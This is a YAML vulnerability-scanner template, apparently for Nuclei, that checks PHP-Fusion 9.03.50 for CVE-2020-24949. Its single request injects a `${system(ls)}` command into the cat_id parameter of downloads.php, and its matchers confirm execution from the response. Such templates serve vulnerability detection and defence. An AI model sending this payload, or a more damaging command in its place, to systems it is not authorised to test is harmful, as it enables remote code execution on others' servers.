40 lines
1.2 KiB
YAML
40 lines
1.2 KiB
YAML
id: CVE-2020-24949
|
|
|
|
info:
|
|
name: PHP-Fusion 9.03.50 - Remote Code Execution
|
|
author: geeknik
|
|
severity: high
|
|
description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt
|
|
- https://github.com/php-fusion/PHP-Fusion/issues/2312
|
|
- http://packetstormsecurity.com/files/162852/PHPFusion-9.03.50-Remote-Code-Execution.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24949
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2020-24949
|
|
cwe-id: CWE-77
|
|
cpe: cpe:2.3:a:php-fusion:php-fusion:*:*:*:*:*:*:*:*
|
|
epss-score: 0.96895
|
|
tags: rce,php,packetstorm,cve,cve2020,phpfusion
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "infusion_db.php"
|